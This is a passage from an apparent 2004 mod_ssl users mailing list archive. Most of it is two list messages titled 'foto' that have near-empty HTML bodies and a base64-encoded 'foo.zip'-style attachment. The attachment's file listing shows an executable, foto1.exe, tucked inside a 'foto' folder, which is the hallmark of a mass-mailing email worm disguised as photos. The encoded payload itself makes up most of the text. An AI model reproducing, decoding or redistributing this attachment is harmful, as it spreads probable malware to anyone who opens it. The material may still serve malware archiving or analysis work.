AAAAABIAwEFxAgAAZm90by9mb3RvL1BLAQIUABQAAAAIAC+PITFDX7olQxAAAAAyAAATAAAA
AAAAAAAAIgDAgZkCAABmb3RvL2ZvdG8vZm90bzEuZXhlUEsFBgAAAAAEAAQA6AAAAA0TAAAA
AA==

----------crevqdogkecwatjwaeal--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 21:21:28 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A8097A8A7D; Tue, 31 Aug 2004 21:21:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from GX260.net (h-66-166-161-242.atlngahp.covad.net [66.166.161.242])
	by master.modssl.org (Postfix) with SMTP id 66FDFA8995
	for ; Tue, 31 Aug 2004 21:21:20 +0200 (CEST)
Date: Tue, 31 Aug 2004 15:20:13 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ghamfdoutjotxmuiagwy"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ghamfdoutjotxmuiagwy
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------ghamfdoutjotxmuiagwy
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
AA==

----------ghamfdoutjotxmuiagwy--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 21:44:56 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E8ACAA8A79; Tue, 31 Aug 2004 21:44:55 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from FRONT-DESK.org (msslapanas13poolc81.mssl.uswest.net [63.227.174.81])
	by master.modssl.org (Postfix) with SMTP id C99A1A8934
	for ; Tue, 31 Aug 2004 21:44:50 +0200 (CEST)
Date: Tue, 31 Aug 2004 13:46:29 -0800
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------hccqjqtyewdiyweihipr"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------hccqjqtyewdiyweihipr
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------hccqjqtyewdiyweihipr
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
AA==

----------hccqjqtyewdiyweihipr--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 21:46:30 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D850CA8D26; Tue, 31 Aug 2004 21:46:30 +0200 (CEST)
